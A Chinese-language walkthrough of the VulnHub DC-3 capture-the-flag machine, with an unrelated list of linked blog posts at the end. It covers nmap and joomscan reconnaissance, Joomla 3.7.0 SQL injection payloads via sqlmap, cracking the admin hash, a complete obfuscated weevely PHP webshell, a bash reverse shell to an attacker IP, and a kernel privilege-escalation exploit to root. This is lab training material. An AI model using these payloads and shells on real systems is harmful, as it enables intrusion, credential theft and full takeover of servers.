通过nmap扫描,只开放了80端口,并且该web服务是基于Joomla搭建:

root@kali:~# nmap -A 192.168.74.140

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 10:06 CST

Nmap scan report for 192.168.74.140

Host is up (0.00046s latency).

Not shown: 999 closed ports

PORT   STATE SERVICE VERSION

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

|_http-generator: Joomla! - Open Source Content Management

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Home

MAC Address: 00:0C:29:8A:D7:BC (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

TRACEROUTE

HOP RTT     ADDRESS

1   0.46 ms 192.168.74.140

通过joomscan确定joomla版本信息和后台路径:

perl joomscan.pl -u http://192.168.74.140 -ec

[+] FireWall Detector

[++] Firewall not detected

[+] Detecting Joomla Version

[++] Joomla 3.7.0

[+] Core Joomla Vulnerability

[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing

[++] directory has directory listing :

http://192.168.74.140/administrator/components

http://192.168.74.140/administrator/modules

http://192.168.74.140/administrator/templates

http://192.168.74.140/images/banners

[+] Checking apache info/status files

[++] Readable info/status files are not found

[+] admin finder

[++] Admin page : http://192.168.74.140/administrator/

在kali上搜索joomla 3.7.0:

root@kali:~/joomscan# searchsploit joomla 3.7.0

------------------------------------------------------------------------------------------------------------------ ----------------------------------------

 Exploit Title                                                                                                    |  Path

                                                                                                                  | (/usr/share/exploitdb/)

------------------------------------------------------------------------------------------------------------------ ----------------------------------------

Joomla! 3.7.0 - 'com_fields' SQL Injection                                                                        | exploits/php/webapps/42033.txt

------------------------------------------------------------------------------------------------------------------ ----------------------------------------

Shellcodes: No Result

存在一个SQL注入漏洞(https://www.freebuf.com/vuls/135035.html),其中有详细的利用方法:

root@kali:~/joomscan# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

# Exploit Title: Joomla 3.7.0 - Sql Injection

# Date: 05-19-2017

# Exploit Author: Mateus Lino

# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

# Vendor Homepage: https://www.joomla.org/

# Version: = 3.7.0

# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux

# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap: 

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)

    Type: boolean-based blind

    Title: Boolean-based blind - Parameter replace (DUAL)

    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based

    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)

    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)

    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

尝试通过sqlmap写入shell失败,通过sqlmap跑出admin的密码:

Database: joomladb

Table: #__users

[1 entry]

+-----+-------+--------------------------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+

| id  | name  | email                    | params                                                                                       | username | password                                                     |

+-----+-------+--------------------------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+

| 629 | admin | freddy@norealaddress.net | {"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","timezone":""} | admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |

+-----+-------+--------------------------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+

通过john破解出原始密码:

root@kali:~# echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > test

root@kali:~# cat test

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

root@kali:~# john test

Using default input encoding: UTF-8

Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])

Cost 1 (iteration count) is 1024 for all loaded hashes

Proceeding with single, rules:Single

Press 'q' or Ctrl-C to abort, almost any other key for status

Almost done: Processing the remaining buffered candidate passwords, if any.

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist

snoopy           (?)

1g 0:00:00:01 DONE 2/3 (2020-04-16 15:33) 0.6410g/s 23.07p/s 23.07c/s 23.07C/s mustang..buster

Use the "--show" option to display all of the cracked passwords reliably

Session completed

root@kali:~#

登录后台后,通过编辑模板除创建php文件写入shell:

通过weevely生成shell(https://www.freebuf.com/sectool/39765.html):

root@kali:~# weevely generate shell ./shell.php

Generated './shell.php' with password 'shell' of 772 byte size.

root@kali:~# cat shell.php

<?php

$f='@6H6Hbase66H4_encode(@x(@g6Hzco6Hm6Hpress($o),$k)6H);print("$p6H$k6Hh$r$kf");}';

$E='$k="2596H1c96H6H8b";$kh="7016H19fe6H6246H89";6H$kf6H="8b1e426H4b5e96H1";';

$h='$p="n39RTfVg6HnsNr3JV6HR";f6H6Hunction x($t,$k6H)6H{$c6H=strlen($k)6H;$l';

$p=str_replace('R','','creRatReR_fuRncRtiRon');

$V='=6H=1){@o6Hb_s6Htart();@6He6Hval(@gzuncomp6Hress(6H@x(@bas6He66H4_decode($m';

$b='[1]6H),$k))6H);$o=6H@o6Hb_get_con6H6Hten6Hts();@6Hob_end_clean();$r=6H';

$i='tch("/$kh(.6H+)$kf/",@6Hf6Hile_get_con6Htents6H("php:/6H/input"6H),$m)6H';

$g='6H=strlen6H($t);$o="";6H6Hfor6H($i=0;$6Hi<$6Hl;){for($j=0;6H($j<$c&&';

$c='$6Hi<$l);$j6H6H++,6H$i++){6H$o.6H=$t{$6Hi}^$k{$j};}}re6Hturn $o;6H}if(6H6H@preg_ma6H';

$O=str_replace('6H','',$E.$h.$g.$c.$i.$V.$b.$f);

$R=$p('',$O);$R();

?>

在templates中创建一个名为shell.php的页面,把shell脚本粘贴进去保存:

使用weevly连接shell:

root@kali:~# weevely http://192.168.74.140/templates/beez3/shell.php shell

/usr/share/weevely/core/sessions.py:219: YAMLLoadWarning: calling yaml.load() without Loader=... is deprecated, as the default Loader is unsafe. Please read https://msg.pyyaml.org/load for full details.

  sessiondb = yaml.load(open(dbpath, 'r').read())

[+] weevely 3.7.0

[+] Target:     192.168.74.140

[+] Session:    /root/.weevely/sessions/192.168.74.140/shell_1.session

[+] Browse the filesystem or execute commands starts the connection

[+] to the target. Type :help for more information.

weevely> whoami

www-data

www-data@DC3VM:/var/www/html/templates/beez3 $

SUID提权和本地常见的命令提权都没戏,查看系统版本信息,尝试通过内核漏洞提权:

www-data@DC3VM:/var/www/html/templates/beez3 $ cat /etc/issue

Ubuntu 16.04 LTS \n \l

查找exploit:

root@kali:~# searchsploit ubuntu 16.04

------------------------------------------------------------------------------------------------------------------ ----------------------------------------

 Exploit Title                                                                                                    |  Path

                                                                                                                  | (/usr/share/exploitdb/)

------------------------------------------------------------------------------------------------------------------ ----------------------------------------

Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution                                                  | exploits/linux/local/40937.txt

Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                                     | exploits/linux/local/40054.c

Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Downl | exploits/linux/local/40943.txt

LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation                                         | exploits/linux/local/41923.txt

Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_6 | exploits/linux_x86-64/local/42275.c

Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Pr | exploits/linux_x86/local/42276.c

Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps                                             | exploits/linux/dos/39773.txt

Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read                         | exploits/linux/local/45175.c

Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                   | exploits/linux/local/40759.rb

Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak                                | exploits/linux/dos/46529.c

Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                  | exploits/linux_x86-64/local/40871.c

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation             | exploits/linux_x86-64/local/40049.c

Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation    | exploits/linux/local/47170.c

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                      | exploits/linux/local/39772.txt

Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation                            | exploits/linux/local/40489.txt

Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                                                        | exploits/linux/dos/45919.c

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                     | exploits/linux/local/45010.c

Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                            | exploits/linux/local/44298.c

Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                 | exploits/linux/local/44300.c

Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)             | exploits/linux/local/43418.c

Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR | exploits/linux/local/47169.c

------------------------------------------------------------------------------------------------------------------ ----------------------------------------

Shellcodes: No Result

root@kali:~#

尝试了多个提权漏洞都没有成功,最后使用如下漏洞成功:

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                      | exploits/linux/local/39772.txt

在该txt文件中有利用脚本的下载地址:

Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

下载到kaili上,解压后将exploit.tar文件放到/var/www/html目录,启动apache,从DC3 通过wget下载该exploit文件。解压后编译:

www-data@DC3VM:/var/www/html/templates/beez3 $ tar -xf exploit.tar

www-data@DC3VM:/var/www/html/templates/beez3 $ ls

a.out

component.php

css

ebpf_mapfd_doubleput_exploit

error.php

exploit.tar

favicon.ico

html

images

index.php

javascript

jsstrings.php

language

shell.php

templateDetails.xml

template_preview.png

template_thumbnail.png

www-data@DC3VM:/var/www/html/templates/beez3 $ cd ebpf_mapfd_doubleput_exploit

www-data@DC3VM:/var/www/html/templates/beez3/ebpf_mapfd_doubleput_exploit $ ls

compile.sh

doubleput.c

hello.c

suidhelper.c

www-data@DC3VM:/var/www/html/templates/beez3/ebpf_mapfd_doubleput_exploit $ ./compile.sh

doubleput.c: In function 'make_setuid':

doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]

    .insns = (__aligned_u64) insns,

             ^

doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]

    .license = (__aligned_u64)""

               ^

www-data@DC3VM:/var/www/html/templates/beez3/ebpf_mapfd_doubleput_exploit $ ls

compile.sh

doubleput

doubleput.c

hello

hello.c

suidhelper

suidhelper.c

执行./doubleput,多次都未提权成功,感觉不是很稳定,尝试写入反弹shell后,通过kali监听:

<?php

system("bash -c 'bash -i >& /dev/tcp/192.168.74.137/4444 0>&1' ");

?>

利用成功:

root@kali:/var/www/html/ebpf_mapfd_doubleput_exploit# netcat -nltp 4444

bash: cannot set terminal process group (1265): Inappropriate ioctl for device

bash: no job control in this shell

www-data@DC3VM:/var/www/html/templates/beez3$ ls

ls

a.out

bash.php

component.php

css

ebpf_mapfd_doubleput_exploit

error.php

exploit.tar

favicon.ico

html

images

index.php

javascript

jsstrings.php

language

shell.php

templateDetails.xml

template_preview.png

template_thumbnail.png

www-data@DC3VM:/var/www/html/templates/beez3$ cd ebpf_mapfd_doubleput_exploit

cd ebpf_mapfd_doubleput_exploit

www-data@DC3VM:/var/www/html/templates/beez3/ebpf_mapfd_doubleput_exploit$ ./doubleput

<l/templates/beez3/ebpf_mapfd_doubleput_exploit$ ./doubleput

suid file detected, launching rootshell...

we have root privs now...

starting writev

woohoo, got pointer reuse

writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.

id

uid=0(root) gid=0(root) groups=0(root),33(www-data)

ls /root

the-flag.txt

car^Ht

bash: line 4: $'car\bt': command not found

bat

bash: line 5: bat: command not found

cat /root/the-flag.txt

 __        __   _ _   ____                   _ _ _ _

 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |

  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |

   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|

    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)

Congratulations are in order for completing DC-3VM.  :-)

I hope you've enjoyed this challenge as much as I enjoyed making it.

If there are any ways that I can improve these little challenges,

please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

总结:

1、namp进行地址探测,进而确定端口和服务

2、在kali上基于服务器组件及其版本号可以全局搜索利用脚本searchsploit xxx

3、通过weevely可以写入生成php shell脚本,并且可以连接该shell

4、通过searchsploit全局搜索提权脚本进行linux内核提权

vulnhub: DC 3的更多相关文章

  1. vulnhub: DC 9

    信息收集: root@kali:/opt/test# nmap -A -v 192.168.76.137 Starting Nmap 7.80 ( https://nmap.org ) at 2020 ...

  2. vulnhub: DC 4

    信息收集: yurang@kali:~$ nmap -sn 192.168.76.1/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 ...

  3. vulnhub靶机之DC6实战(wordpress+nmap提权)

    0x00环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip dc6以nat模式在vmware上打开 kali2019以nat模式启动,ip地址为 ...

  4. Vulnhub靶场DC-1 WP

    前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...

  5. DC靶机1-9合集

    DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基 ...

  6. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

  7. Vulnhub dc-4靶机通关

    Vulnhub dc-4靶机通关 下载地址:https://download.vulnhub.com/dc/DC-4.zip 安装好dc-4靶机 使用局域网查看器扫描到ip地址 端口扫描,发现运行了8 ...

  8. LDAP 中 CN, OU, DC 的含义

    1. LDAP的存储规则 区分名(DN,Distinguished Name) 和自然界中的树不同,文件系统/LDAP/电话号码簿目录的每一片枝叶都至少有一个独一无二的属性,这一属性可以帮助我们来区别 ...

  9. 【关于HBITMAP, DC, MEM DC, Clipboard】将HBITMAP拷贝到Clipboard(Windows Clipboard & OLE Clipboard)

    参考: Programming Windows with MFC, 2nd. Chapter 18, 19. 建议把这两章学习完(至少到OLE drag-and-drop之前要学习完)再来尝试OLE ...

随机推荐

  1. 多线程之Callable

    多线程实现Callable的好处有三点 1.Callable支持泛型 2.Callable支持返回值 3.Callable可以抛出异常 class MyThread2 implements Calla ...

  2. 关于隐私保护的英文论文的阅读—— How to read English thesis

    首先 开始我读论文时 也是恨不得吃透每个单词 但是后来转念一想 没必要每个单词都弄懂 因为 一些程度副词 修饰性的形容词等 这些只能增强语气罢了 对文章主题的理解并没有天大的帮助 而读文章应该首先把握 ...

  3. Spring Boot注解与资源文件配置

    date: 2018-11-18 16:57:17 updated: 2018-11-18 16:57:17 1.不需要多余的配置文件信息 application.properties mybatis ...

  4. WIN32之消息队列

    0x01. 什么是消息? 当我们点击鼠标的时候,或者当我们按下键盘的时候,操作系统都要把这些动作记录下来,存储到结构体中,这个结构体就是 消息 比如我们点击运行程序,是通过消息队列获取,通过explo ...

  5. python使用SVC算法

    python使用SVC算法评估汽车价值 关注公众号"轻松学编程"了解更多. 这是一个关于汽车测评的数据集, 类别变量为汽车的测评: (unacc,ACC,good,vgood) ​ ...

  6. 【Luogu】P1402 酒店之王 题解

    原题链接 这道题,很明显是个配对问题.于是,我们可以想到用网络最大流来做. 先整理一下题目条件. 很明显,根据贪心思想,要使最多人满意,每个人应该最多睡一个房间(似乎也没有人能睡两个房间),吃一道菜. ...

  7. LDA与PCA

    参考: https://www.cnblogs.com/pinard/p/6244265.html https://blog.csdn.net/qq_25680531/article/details/ ...

  8. git commit后如何取消commit

    在git使用中要如何取消commit但是还未push的操作? 通常,我们对修改的文件会先git add .,然后git commmit -m "注释",但是如果commit错了,想 ...

  9. Cacti如何实现电话告警

    Cacti是一套基于PHP,MySQL,SNMP及RRD Tool开发的网络流量监测图形分析工具.Cacti提供了一个快速轮询器,高级图表模板,多种数据采集方法和用户管理功能.所有这一切都被包装在一个 ...

  10. 【JVM第四篇--运行时数据区】堆

    写在前面的话:本文是在观看尚硅谷JVM教程后,整理的学习笔记.其观看地址如下:尚硅谷2020最新版宋红康JVM教程 一.堆的概述 JVM的运行时数据区如下: 一个Java程序运行起来对应着一个进程(操 ...